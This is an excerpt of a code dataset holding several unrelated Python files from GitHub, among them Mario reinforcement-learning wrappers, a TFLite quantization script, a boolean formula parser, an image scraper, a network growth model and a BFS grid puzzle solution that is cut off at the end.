= self.env.step(action)\n self._elapsed_steps += 1\n if self._elapsed_steps > self._max_episode_steps:\n done = True\n return observation, reward, done, info\n\n def reset(self):\n self._elapsed_steps = 0\n return self.env.reset()\n\nclass SMBMarioFitnessWrapper(gym.Wrapper):\n def __init__(self, env):\n self.max_x_distance = 0\n super(SMBMarioFitnessWrapper, self).__init__(env)\n\n def step(self, action):\n o, r, done, info = self.env.step(action)\n mario_x = info[\"player_xpos_high\"] * 256 + info[\"player_xpos_low\"]\n if mario_x < self.max_x_distance:\n r = 0\n else:\n self.max_x_distance = mario_x\n\n return o, r, done, info\n\n def reset(self):\n self.max_x_distance = 0\n return self.env.reset()\n\nclass SkipFrame(gym.Wrapper):\n def __init__(self, env, skip=4):\n self.skip = skip\n self.observation_buffer = deque(maxlen=2)\n super(SkipFrame, self).__init__(env)\n\n def step(self, action):\n \"\"\"Step with an action for skip time steps\"\"\"\n skip_reward = 0.0\n done = None\n for _ in range(self.skip):\n o, r, done, info = self.env.step(action)\n self.observation_buffer.append(o)\n skip_reward += r\n if done:\n break\n observation_frame = np.max(\n np.stack(self.observation_buffer), axis=0\n )\n return observation_frame, skip_reward, done, info\n\n def reset(self):\n \"\"\"Reset the environment and return the next frame\"\"\"\n 
self.observation_buffer.clear()\n o = self.env.reset()\n self.observation_buffer.append(o)\n return o\n\nclass TimeLimitWithRewardThreshold(gym.Wrapper):\n def __init__(self, env, max_episode_steps=None, reward_threshold=0.1, frame_timeout_max=40):\n gym.Wrapper.__init__(self, env)\n self.reward_threshold = reward_threshold\n self._max_episode_steps = max_episode_steps\n self._elapsed_steps = 0\n self.steps_until_done = frame_timeout_max\n self.frame_timeout_max = frame_timeout_max\n\n def step(self, action):\n observation, reward, done, info = self.env.step(action)\n self._elapsed_steps += 1\n self.steps_until_done = self.steps_until_done - 1\n\n if reward > 0:\n self.steps_until_done = self.frame_timeout_max\n\n if self.steps_until_done < 0:\n done = True\n\n return observation, reward, done, info\n\n def reset(self):\n self._elapsed_steps = 0\n self.steps_until_done = self.frame_timeout_max\n return self.env.reset()\n\nclass LimitedDiscreteActions(gym.ActionWrapper):\n KNOWN_BUTTONS = {\"A\", \"B\"}\n KNOWN_SHOULDERS = {\"L\", \"R\"}\n\n '''\n Reproduces the action space from curiosity paper.\n '''\n\n def __init__(self, env, all_buttons, whitelist=KNOWN_BUTTONS | KNOWN_SHOULDERS):\n gym.ActionWrapper.__init__(self, env)\n\n self._num_buttons = len(all_buttons)\n button_keys = {i for i in range(len(all_buttons)) if all_buttons[i] in whitelist & self.KNOWN_BUTTONS}\n buttons = [(), *zip(button_keys), *itertools.combinations(button_keys, 2)]\n shoulder_keys = {i for i in range(len(all_buttons)) if all_buttons[i] in whitelist & self.KNOWN_SHOULDERS}\n shoulders = [(), *zip(shoulder_keys), *itertools.permutations(shoulder_keys, 2)]\n arrows = [(), (4,), (5,), (6,), (7,)] # (), up, down, left, right\n acts = []\n acts += arrows\n acts += buttons[1:]\n acts += [a + b for a in arrows[-2:] for b in buttons[1:]]\n self._actions = acts\n self.action_space = gym.spaces.Discrete(len(self._actions))\n\n def action(self, a):\n mask = np.zeros(self._num_buttons)\n for i in self._actions[a]:\n mask[i] = 1\n return mask\n\ndef create_smb_nes_env(max_episode_steps=3000):\n # Create gym env\n env = retro.make('SuperMarioBros-Nes', \"Level1-1\")\n buttons = env.buttons\n env = TimeLimitWithRewardThreshold(\n SMBMarioFitnessWrapper(\n LimitedDiscreteActions(\n\n ProcessFrame(\n SkipFrame(\n env\n )\n ), buttons\n )\n ), max_episode_steps=max_episode_steps\n )\n obs = env.reset()\n return env, obs\n\n\ndef create_ppo_smb_nes_env(env):\n env = SkipFrame(env)\n env = ProcessFrame(env)\n env = ExtraTimeLimit(env)\n env = ImageToPyTorch(env)\n env = LimitedDiscreteActions(env, env.buttons)\n return env\n","repo_name":"GraysonGrzadzielewski/Capstone","sub_path":"Capstone/utils/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
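The SkipFrame wrapper in the record above returns the element-wise maximum over the last two raw frames, a standard trick for removing sprite flicker on Atari/NES. The core operation, isolated on toy arrays of my own:

```python
import numpy as np
from collections import deque

# Toy illustration of the two-frame max-pooling done in SkipFrame.step:
# a sprite visible in only one of two consecutive frames survives the max.
buffer = deque(maxlen=2)
frame_a = np.zeros((4, 4), dtype=np.uint8); frame_a[1, 1] = 255  # sprite here this frame
frame_b = np.zeros((4, 4), dtype=np.uint8); frame_b[2, 2] = 255  # ...and here the next
buffer.append(frame_a)
buffer.append(frame_b)

pooled = np.max(np.stack(buffer), axis=0)
assert pooled[1, 1] == 255 and pooled[2, 2] == 255  # both sprites kept
```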
+{"seq_id":"38194965529","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1,2,3\"\nimport logging\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom tqdm.auto import tqdm as tq\nimport tensorflow as tf\nfrom tensorflow.keras import mixed_precision\nimport wandb\nfrom wandb.keras import WandbCallback, WandbMetricsLogger\n\n# private\nfrom modules.model import A2IModel\nfrom modules.lr_scheduler import CustomOneCycleSchedule, LearningRateLogger\nfrom cfg import configs\nimport functions\n\nmodel = A2IModel(configs=configs)\nmodel.initialize()\nscheduler = CustomOneCycleSchedule(\n max_lr=configs.optimizer.learning_rate, \n epochs=configs.general.epochs,\n steps_per_epoch=500,\n start_lr=None, end_lr=None, warmup_fraction=configs.optimizer.warm_up_rate,\n)\noptimizer = tf.keras.optimizers.AdamW(\n learning_rate=scheduler,\n weight_decay=configs.optimizer.weight_decay,\n beta_1=configs.optimizer.beta_1,\n beta_2=configs.optimizer.beta_2,\n ema_momentum=configs.optimizer.ema_momentum,\n)\nmodel.compile(optimizer=optimizer)\nmodel.load_weights('/home/n1/sangsooim/2_AAI/project/version7/densenet_best_model_15-47.51.h5')\n\ntrain_dataset= functions.load_datasets(configs)\n\n#PTQ\ndef representative_data_gen():\n for img, label in train_dataset.batch(1).take(100):\n img = tf.reshape(img, shape=[1, 320, 320, 1])\n yield [img]\n\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\n\n# 옵션들\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_data_gen # 함수로 설정해야 한다.\n# Ensure that if any ops can't be quantized, the converter throws an error\nconverter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8] # 이 모델은 integer 연산만 할 것\n# Set the input and output tensors to uint8 (APIs added in r2.3)\nconverter.inference_input_type = tf.uint8 # or tf.int8\nconverter.inference_output_type = tf.uint8 # or tf.int8\n# 옵션 끝\n\npost_quant_tflite_model = converter.convert()\n\nwith tf.io.gfile.GFile('baseline_quant_model.tflite', 'wb') as f:\n f.write(post_quant_tflite_model)","repo_name":"Stomper10/maai-cxr","sub_path":"src/sangsoo/ptq_v7code.py","file_name":"ptq_v7code.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42812627433","text":"from models.node import Vertex\nfrom settings import RED, BLACK, SELECTED_ITEM_COLOR, WHITE\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import Qt\n\n\nclass CanvasNode:\n \"\"\"Класс для вершины на холсте\"\"\"\n def __init__(self, node: Vertex, parent):\n self.parent = parent\n self.node_id = node.id\n self.node_name = node.name\n self.node_name_stipped = self.node_name.strip('\"')\n self.color = RED\n self.row, self.col = node.cell\n self.selected = False\n self.bool_colorize = True\n self.bool_draw_textbox = False\n\n def __str__(self):\n return self.node_name_stipped\n\n def setColor(self, color):\n self.color = color\n \n def change_color_condition(self):\n self.bool_colorize = not self.bool_colorize\n\n def setName(self, name: str):\n \"\"\"Установка нового имени\"\"\"\n self.node_name = name\n self.node_name_stipped = name.strip('\"')\n\n def setCell(self, row, col):\n \"\"\"Установка новых координат\"\"\"\n self.row, self.col = row, col\n\n def select(self):\n self.selected = True\n\n def unselect(self):\n self.selected = False\n \n def get_text_rect(self, font_size: int, dist: int, x: int, y: int) -> tuple[int]:\n \"\"\"Возвращает параметры прямоугольника, в котором расположено имя вершины\"\"\"\n text_width = font_size * len(self.node_name_stipped)\n new_x = x + dist // 2 - text_width // 2\n return new_x, y, text_width, dist\n\n def draw(self):\n \"\"\"Рисование вершины\"\"\"\n dist = self.parent.dist\n x, y = self.parent.getPoint(self.row, self.col)\n font_size = int(dist // 2)\n font = QFont()\n font.setPixelSize(font_size)\n self.parent.qp.setBrush(SELECTED_ITEM_COLOR if self.selected else self.color)\n self.parent.qp.setPen(BLACK)\n self.parent.qp.setFont(font)\n if self.bool_colorize:\n self.parent.qp.drawEllipse(int(x), int(y), int(dist), int(dist))\n text_rect = self.get_text_rect(font_size, int(dist), int(x), int(y))\n if self.bool_draw_textbox:\n self.parent.qp.setBrush(WHITE)\n self.parent.qp.setPen(WHITE)\n self.parent.qp.drawRect(*text_rect)\n self.parent.qp.setPen(BLACK)\n self.parent.qp.drawText(*text_rect, Qt.AlignCenter, self.node_name_stipped)\n\n","repo_name":"staffeev/AmongGraphs","sub_path":"canvas/canvas_node.py","file_name":"canvas_node.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"43083687975","text":"\r\n\r\ndef foo(x: int, base: int):\r\n \"\"\"Change numerical base of input number x to base.\r\n return string representation after the conversion.\r\n base numbers are less than 10.\r\n >>> foo(8, 3)\r\n '22'\r\n >>> foo(8, 2)\r\n '1000'\r\n >>> foo(7, 2)\r\n '111'\r\n \"\"\"\r\n res = \"\"\r\n while x > 0:\r\n res = str(x % base) + res\r\n x //= base\r\n return res\r\n\r\n","repo_name":"mirayayerdem/Github-Copilot-Amazon-Whisperer-ChatGPT","sub_path":"misc/Experiment results/ChatGPT/Dummy Function Names/code_generation/44/prompt_44.py","file_name":"prompt_44.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"40188293103","text":"#####################################################################\n## Parser for sentences\n## The function parse_sentence is heavily inspired by\n## https://github.com/pyparsing/pyparsing/blob/master/examples/simpleBool.py#L16\n## It has been altered for this application.\n#####################################################################\n\nfrom pyparsing import infixNotation, opAssoc, Keyword, Word, alphanums, ParserElement\nfrom nnf import Var, Or, And # pylint: disable=unused-import\n\nclass Parser:\n \"\"\"A parser class for parsing formulas.\"\"\"\n def parse_sentence(self, sentence):\n \"\"\"Given a formula as a string, parse it and return a list of\n lists with the [] representing brackets. So x1 | (x2 & ~x3)\n returns [x1, |, [x2, &, [~, x3]]] \"\"\"\n # Create space between negations and atoms\n prep_sentence = sentence.split(\"~\")\n prep_sentence = \"~ \".join(prep_sentence)\n\n ParserElement.enablePackrat()\n\n\t\t# Define classes to be built at parse time, as each matching\n\t\t# expression type is parsed. Each class has a as_list method\n\t\t# that returns itself and its elements in list representation\n\t\t# (recursively).\n class BoolOperand:\n \"\"\"The class BoolOperand\"\"\"\n def __init__(self, t):\n self.label = t[0]\n\n def __str__(self) -> str:\n return self.label\n\n __repr__ = __str__\n\n def as_list(self):\n return self.label\n\n class BoolNot:\n \"\"\"The class for negations.\"\"\"\n def __init__(self, t):\n self.arg = t[0][1]\n\n def __str__(self) -> str:\n return \"~\" + str(self.arg)\n\n __repr__ = __str__\n\n def as_list(self):\n return [\"~\", self.arg.as_list()]\n\n class BoolBinOp:\n \"\"\"The parent class for binary operations.\"\"\"\n repr_symbol: str = \"\"\n\n def __init__(self, t):\n self.args = t[0][0::2]\n\n def __str__(self) -> str:\n sep = \" %s \" % self.repr_symbol\n return \"(\" + sep.join(map(str, self.args)) + \")\"\n\n\n class BoolAnd(BoolBinOp):\n \"\"\"The class for conjunctions.\"\"\"\n repr_symbol = \"&\"\n def as_list(self):\n \"\"\"Returns list of conjuncts with '&' symbol.\"\"\"\n result = []\n for argument in self.args:\n result.append(argument.as_list())\n result.append(\"&\")\n result = result[:-1]\n return result\n\n class BoolOr(BoolBinOp):\n \"\"\"The class disjunctions.\"\"\"\n repr_symbol = \"|\"\n def as_list(self):\n \"\"\"Return list of disjuncts with '|' symbol.\"\"\"\n result = []\n for argument in self.args:\n result.append(argument.as_list())\n result.append(\"|\")\n result = result[:-1]\n return result\n\n class BoolImplies(BoolBinOp):\n \"\"\"The class for implications.\"\"\"\n repr_symbol = \"->\"\n def as_list(self):\n \"\"\"Return implications in list form with '->' symbol.\"\"\"\n return [self.args[0].as_list(), \"->\", self.args[1].as_list()]\n\n # Define what the operator symbols mean\n NOT = Keyword(\"~\")\n AND = Keyword(\"&\")\n OR = Keyword(\"|\")\n IMPLIES = Keyword(\"->\")\n\n # Atoms can be alphanumerals\n bool_operand = Word(alphanums)\n bool_operand.setParseAction(BoolOperand).setName(\"bool_operand\")\n\n bool_expr = infixNotation(\n bool_operand,\n [\n # Define precedence of operations\n (NOT, 1, opAssoc.RIGHT, BoolNot),\n (OR, 2, opAssoc.LEFT, BoolOr),\n (AND, 2, opAssoc.LEFT, BoolAnd),\n (IMPLIES, 2, opAssoc.LEFT, BoolImplies)\n ],\n )\n\n # Create a parse object\n parsed_sentence = bool_expr.parseString(prep_sentence)[0]\n\n # Return the parsed sentence as a list\n return parsed_sentence.as_list()\n\n def to_nnf(self, sentence):\n \"\"\"Given a formula as a 
string, returns a string of the\n formula converted to NNF.\"\"\"\n # Parse the sentence and then convert it to NNF\n parsed = self.parse_sentence(sentence)\n nnf = self.to_nnf_parsed(parsed)\n\n return nnf\n\n def to_nnf_parsed(self, sentence):\n \"\"\"Helper function for the recursive proces of the to_nnf function.\n Given a formula, returns the formula partially converted\n to NNF. \"\"\"\n # If the sentence is just a string, leave it be\n if isinstance(sentence, str):\n return sentence\n # If it is negated, push the negation through\n if sentence[0] == '~':\n if isinstance(sentence[1], str):\n return \"\".join(sentence)\n if sentence[1][1] == '&':\n return self.neg_and(sentence[1])\n if sentence[1][1] == '|':\n return self.neg_or(sentence[1])\n if sentence[1][1] == '->':\n return self.neg_implies(sentence[1])\n # Remove double negations\n if sentence[1][0] == '~':\n return self.to_nnf_parsed(sentence[1][1])\n raise Exception(\"There seems to be something wrong..\")\n # If it is not negated, rewrite implication and\n # search for more negations\n operator = sentence[1]\n if operator == '->':\n left = self.to_nnf_parsed(['~', sentence[0]])\n right = self.to_nnf_parsed(sentence[2])\n return \" \".join(['(', left, '|', right, ')'])\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(value)\n result.append(element)\n result.append(operator)\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_and(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated conjunction,\n returns a disjunction with the disjuncts negated. \"\"\"\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(['~', value])\n result.append(element)\n result.append('|')\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_or(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated disjunction,\n returns a conjuncts with the conjuncts negated. \"\"\"\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(['~', value])\n result.append(element)\n result.append('&')\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_implies(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated implication,\n returns a disjunction with the antecedent negated.\"\"\"\n # Negate the antecedent\n antecedent = self.to_nnf_parsed(['~', sentence[0]])\n consequent = self.to_nnf_parsed(sentence[2])\n\n # Return the negated implication as a conjunction\n return \" \".join(['(', antecedent, '|', consequent, ')'])\n\n def to_cnf(self, sentence, variables):\n \"\"\"\n Translate a sentence from NNF (as produced by the to_nnf function), to CNF.\n The function needs a formula/sentence as a string and a list of all\n variables occuring in the sentence. 
It returns the CNF formula and\n an updated list of all occurring variables.\n \"\"\"\n my_string = sentence\n all_variables = set()\n\n # Use a prefix to prevent variable name collisions\n # Add this prefix to all variables in the string\n var_prefix = \"_\"\n my_string_preprocessed = my_string\n for var in variables:\n my_string_preprocessed = my_string_preprocessed.replace(var, var_prefix + var)\n\n # Declare variables (with prefix) and parse the formula with the\n # variable prefixes added\n for var in variables:\n exec(f\"{var_prefix}{var} = Var('{var}')\")\n all_variables.add(var)\n formula = eval(my_string_preprocessed)\n\n # Translate the formula to CNF and update what variables\n # occur in the formula.\n formula = formula.to_CNF()\n for var in formula.vars():\n if not isinstance(var, str):\n all_variables.add('a' + str(var)[:4])\n else:\n all_variables.add(var)\n\n # Translate formula to string.\n list_of_conjuncts = []\n for conjunct in formula:\n conj = \"( \"\n disjunct_counter = 0\n for disjunct in conjunct:\n if str(disjunct)[-1] == '>':\n disjunct = \"a\".join(str(disjunct)[:-1].split('<'))\n if disjunct_counter < len(conjunct) - 1:\n conj = conj + str(disjunct) + \" | \"\n else:\n conj = conj + str(disjunct) + \" )\"\n disjunct_counter += 1\n list_of_conjuncts.append(conj)\n if len(formula) == 1:\n return [list_of_conjuncts[0], all_variables]\n formula_str = \"( \"\n for i, value in enumerate(list_of_conjuncts):\n if i < len(list_of_conjuncts) - 1:\n formula_str = formula_str + value + \" & \"\n else:\n formula_str = formula_str + value + \" )\"\n return [formula_str, all_variables]\n\n def translate_agenda(self, agenda):\n \"\"\"Given a (sub)-agenda returns a list of constraints. For each issue a\n constraint is added of the form (label -> formula) and (formula -> label).\n Both are made sure to be NNF formulas. \"\"\"\n new_constraints = []\n for label in agenda.keys():\n label_var = f'l{label}'\n formula = agenda[label]\n\n # Add label -> formula\n new_constraints.append(f'~{label_var} | {formula}')\n\n # Add formula -> label\n neg_formula = self.to_nnf(f'~ ({formula})')\n new_constraints.append(f'{neg_formula} | {label_var}')\n\n return new_constraints\n","repo_name":"rdehaan/jaggpy","sub_path":"src/jaggpy/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":10426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
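A usage sketch for the Parser record above, assuming pyparsing and the nnf package are installed (the module's own imports require both). The outputs in the comments are what the code paths should produce; treat them as illustrative.

```python
# Usage sketch for the jaggpy Parser; requires pyparsing and nnf.
parser = Parser()

print(parser.parse_sentence("x1 | (x2 & ~x3)"))
# -> ['x1', '|', ['x2', '&', ['~', 'x3']]] (nested lists stand for brackets)

print(parser.to_nnf("~(p & q)"))
# -> '( ~p | ~q )' -- the negation is pushed inward by De Morgan

cnf, all_vars = parser.to_cnf("( ~p | q )", ["p", "q"])
print(cnf, all_vars)  # a clause string plus the updated variable set
```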
+{"seq_id":"4883573718","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Dict\n\nimport pymunk\n\nif TYPE_CHECKING:\n from ...entity import Entity\n\nSIMULATION_STEPS = 10\nSPACE_DAMPING = 0.9\n\nPYMUNK_STEPS = 10\n\n\nclass SpaceManager:\n\n space: pymunk.Space\n\n def __init__(self, pymunk_steps=PYMUNK_STEPS, **kwargs):\n assert pymunk_steps > 0\n self.pymunk_steps = pymunk_steps\n self.custom_collision_types: Dict[str, int] = {}\n\n def initialize_space(self):\n \"\"\"Method to initialize Pymunk empty space for 2D physics.\n\n Returns: Pymunk Space\n\n \"\"\"\n self.space = pymunk.Space()\n self.space.gravity = pymunk.Vec2d(0.0, 0.0)\n self.space.damping = SPACE_DAMPING\n\n def pymunk_step(self):\n for _ in range(self.pymunk_steps):\n self.space.step(1.0 / self.pymunk_steps)\n\n def check_overlapping(self, entity: Entity, coordinates: object) -> object:\n\n entity_shapes = entity.get_all_shapes()\n\n # Generate dummy shapes to check for overlaps\n dummy_body = pymunk.Body(body_type=pymunk.Body.STATIC)\n dummy_shapes = entity.get_dummy_shapes(dummy_body)\n\n self.space.add(dummy_body, *dummy_shapes)\n dummy_body.position, dummy_body.angle = coordinates\n\n self.space.reindex_static()\n\n overlaps = []\n for dummy_shape in dummy_shapes:\n overlaps += self.space.shape_query(dummy_shape)\n self.space.remove(dummy_body, *dummy_shapes)\n\n # # remove sensor shapes\n overlaps = [\n elem\n for elem in overlaps\n if elem.shape and not elem.shape.sensor and elem.shape not in entity_shapes\n ]\n\n return bool(overlaps)\n","repo_name":"gaorkl/simple-playgrounds","sub_path":"spg/core/playground/manager/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"91"}
+{"seq_id":"17764353495","text":"from urllib.request import urlopen, urlretrieve\nfrom urllib.parse import urlparse, urlunparse\nfrom bs4 import BeautifulSoup\nimport asyncio\nimport concurrent.futures\n\nimport sys\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\ninfo = '''\n USAGE:\n >> python scrape.py \n'''\n\n\ndef get_paths(url):\n response = urlopen(url)\n content = response.read()\n page = BeautifulSoup(content, 'html.parser')\n\n imgs = page.findAll('img')\n imgs = list(filter(lambda x: not(x['src'] is None), imgs))\n\n srcs = [img['src'] for img in imgs]\n\n return srcs\n\n\ndef sanitize(url):\n logging.info(url)\n parsed_url = urlparse(url)\n if parsed_url.netloc is '':\n return 'https://youtube.com{}'.format(url)\n return url\n\n\nasync def main():\n img_paths = get_paths(sys.argv[1])\n logging.info(f'Number of Links Found: {len(img_paths)}')\n img_paths = list(map(sanitize, img_paths))\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:\n loop = asyncio.get_event_loop()\n futures = [\n loop.run_in_executor(\n executor,\n urlretrieve,\n img_path,\n f'./results/{i}.jpg'\n\n )\n for i, img_path in zip(range(len(img_paths)), img_paths)\n ]\n\n for result in await asyncio.gather(*futures):\n pass\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"rgabeflores/Task-Automation","sub_path":"Image-Scraper/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"18210387769","text":"\nimport numpy as np\nimport copy\n\n\nclass UM:\n \"\"\" Utility-based preferential attachment model\n Args:\n m (int): Number of edges added at each step\n coef_k1 (int): Utility coefficient for direct connection\n coef_k2 (int): Utility coefficient for indirect connection\n (>0, otherwise the pool will almost disappear)\n seed (int): Number of seed nodes (ring network)\n N (int): Number of nodes added to the network\n \"\"\"\n def __init__(self, m=1, coef_k1=1, coef_k2=0, seed=5):\n # Initialize & set\n self.m = m\n self.t = 0\n self.coef_k1 = int(coef_k1)\n self.coef_k2 = int(coef_k2)\n\n # Make seed network : ring\n self.nodes = list(range(seed))\n self.N = len(self.nodes)\n self.adjlist_k1 = [[node-1, node+1] for node in range(seed)]\n self.adjlist_k1[0] = [1, seed-1]\n self.adjlist_k1[seed-1] = [0, seed-2]\n self.adjlist_k2 = []\n for node in self.nodes:\n k2_pool = set()\n for node_adj in self.adjlist_k1[node]:\n k2_pool.update(self.adjlist_k1[node_adj])\n k2_pool = k2_pool - set(self.adjlist_k1[node]) - {node}\n self.adjlist_k2 += [list(k2_pool)]\n\n # Make preference pool for utility model\n k1 = [len(adj) for adj in self.adjlist_k1]\n k2 = [len(adj) for adj in self.adjlist_k2]\n u = [int(self.coef_k1 * k1[i] + self.coef_k2 * k2[i]) for i in self.nodes]\n self.pool = []\n for node in self.nodes:\n self.pool += u[node] * [node]\n self.T = len(self.pool)\n if self.T == 0:\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n self.U = [copy.deepcopy(self.T)]\n\n # Summation of k1, k2 info\n self.T1 = sum(k1)\n self.T2 = sum(k2)\n self.K1_sum = [copy.deepcopy(self.T1)]\n self.K2_sum = [copy.deepcopy(self.T2)]\n\n # Initial state info\n self.init_node = self.nodes.copy()\n self.init_k2 = [2] * seed\n\n def add_nodes(self, N):\n for i in range(N):\n # Select node\n self.nodes.append(self.N)\n targets = self.pool\n counter = 0\n new_targets_k1 = []\n while counter < self.m:\n r = np.random.randint(self.T)\n if targets[r] not in new_targets_k1:\n counter += 1\n new_targets_k1.append(targets[r])\n\n # 2 distance from selected node\n new_targets_k2 = []\n for j in new_targets_k1:\n for k in self.adjlist_k1[j]:\n if k not in new_targets_k1:\n if k not in new_targets_k2:\n new_targets_k2 += [k]\n if self.m != 1:\n for j in range(self.m - 1):\n for k in range(j+1, self.m):\n if new_targets_k1[j] not in self.adjlist_k2[new_targets_k1[k]]:\n \"\"\" 거리가 1 이상이면 pool에 서로를 추가할 필요가 있음 \"\"\"\n self.pool += self.coef_k2 * [new_targets_k1[j], new_targets_k1[k]]\n self.T += self.coef_k2 * 2\n self.T2 += 2\n \"\"\" m개의 selected node 끼리 서로를 k2 이웃에 추가 \"\"\"\n self.adjlist_k2[new_targets_k1[j]] += [new_targets_k1[k]]\n self.adjlist_k2[new_targets_k1[k]] += [new_targets_k1[j]]\n\n # Update pool\n if self.coef_k1 >= 0:\n for node in new_targets_k1:\n self.pool += self.coef_k1 * [node]\n for node in new_targets_k2:\n self.pool += self.coef_k2 * [node]\n self.pool += self.coef_k1 * self.m * [self.N]\n self.pool += self.coef_k2 * len(new_targets_k2) * [self.N]\n else:\n # If coef_k1 < 0, delete the node from pool according to the new link\n for node in new_targets_k1:\n for _ in range(-self.coef_k1):\n try:\n self.pool.remove(node)\n except:\n pass\n for node in new_targets_k2:\n self.pool += self.coef_k2 * [node]\n v = int(self.coef_k2 * len(new_targets_k2) + self.coef_k1 * self.m)\n # Update pool when only utility is positive\n if v > 0:\n self.pool += v * [self.N]\n\n # Calculate pool size & k1/k2 summation\n self.T += 2 * self.coef_k1 * self.m + 2 * self.coef_k2 * 
len(new_targets_k2)\n self.T1 += 2 * self.m\n self.T2 += 2 * len(new_targets_k2)\n\n # If there is no node in pool or coefficient is zero, make pool random\n if self.T <= 0:\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n if (self.coef_k1 == 0) and (self.coef_k2 == 0):\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n\n # Update adjlist list\n for j in new_targets_k1:\n self.adjlist_k1[j] += [self.N]\n for j in new_targets_k2:\n self.adjlist_k2[j] += [self.N]\n self.adjlist_k1 += [new_targets_k1]\n self.adjlist_k2 += [new_targets_k2]\n\n # Update parameters & state info\n self.N += 1\n self.t += 1\n self.U += [copy.deepcopy(self.T)]\n self.K1_sum += [copy.deepcopy(self.T1)]\n self.K2_sum += [copy.deepcopy(self.T2)]\n self.init_k2 += [len(new_targets_k2)]\n\n","repo_name":"mons1220/utility-model","sub_path":"utility_model.py","file_name":"utility_model.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
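A short driver for the UM class above (the module name utility_model comes from the record's metadata; running it this way is my assumption). With coef_k2=0 the utility is proportional to degree, so the model essentially reduces to BA-style preferential attachment:

```python
# Driver sketch for the utility model; relies only on the UM class above.
from utility_model import UM

model = UM(m=1, coef_k1=1, coef_k2=0, seed=5)
model.add_nodes(100)

degrees = [len(adj) for adj in model.adjlist_k1]
print(model.N)        # 105: 5 seed nodes plus 100 added
print(max(degrees))   # hubs emerge under degree-proportional attachment
```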
+{"seq_id":"70163708145","text":"from collections import deque\nfrom math import inf\ndef solution():\n time_map=[[inf] * n_cols for _ in range(n_rows)]\n end_row,end_col=0,0\n water_queue,animal_queue=deque(),deque()\n dy=[-1,0,1,0]\n dx=[0,1,0,-1]\n\n \n for row in range(n_rows):\n for col in range(n_cols):\n #출발점\n if board[row][col]==\"S\":\n animal_queue.append((row,col,0))\n #도착점\n if board[row][col]==\"D\":\n end_row,end_col=row,col\n #물이 있는 자리의 좌표\n if board[row][col]==\"*\":\n water_queue.append((row,col,0))\n \n #물의 이동 수행\n visited=[[False] * n_cols for _ in range(n_rows)]\n while water_queue:\n row,col,time=water_queue.popleft()\n \n #이전에 방문한 경우\n if visited[row][col]:\n continue\n visited[row][col]=True\n #물이 해당 좌표에 도달하는 시간\n time_map[row][col]=time\n \n\n for dir in range(4):\n next_row=row+dy[dir]\n next_col=col+dx[dir]\n #범위를 넘어서는 경우\n if next_row < 0 or next_row>=n_rows or next_col<0 or next_col>=n_cols:\n continue\n #다음 좌표가 돌인 경우\n if board[next_row][next_col]==\"X\":\n continue\n #물은 목적지 좌표에 도달할 수 없다.\n if board[next_row][next_col]==\"D\":\n continue\n\n water_queue.append((next_row,next_col,time+1))\n \n #고슴도치의 이동 수행\n visited=[[False] * n_cols for _ in range(n_rows)]\n while animal_queue:\n row,col,time=animal_queue.popleft()\n #목적지에 도달한 경우\n if (row,col)==(end_row,end_col):\n print(time)\n return\n #이전에 방문한 경우\n if visited[row][col]:\n continue\n visited[row][col]=True\n\n for dir in range(4):\n next_row=row+dy[dir]\n next_col=col+dx[dir]\n #범위를 벗어나는 경우\n if next_row < 0 or next_row>=n_rows or next_col<0 or next_col>=n_cols:\n continue\n #다음 좌표가 돌인 경우\n if board[next_row][next_col]==\"X\":\n continue\n \n #해당 자리에 물이 먼저 도착하는 경우에는 다음 좌표로 이동 불가능\n if time_map[next_row][next_col] <= time+1:\n continue\n animal_queue.append((next_row,next_col,time+1))\n\n print(\"KAKTUS\")\n\n\nif __name__ == \"__main__\":\n with open(\"input3055.txt\",\"r\") as file:\n n_rows,n_cols=map(int,file.readline().split())\n 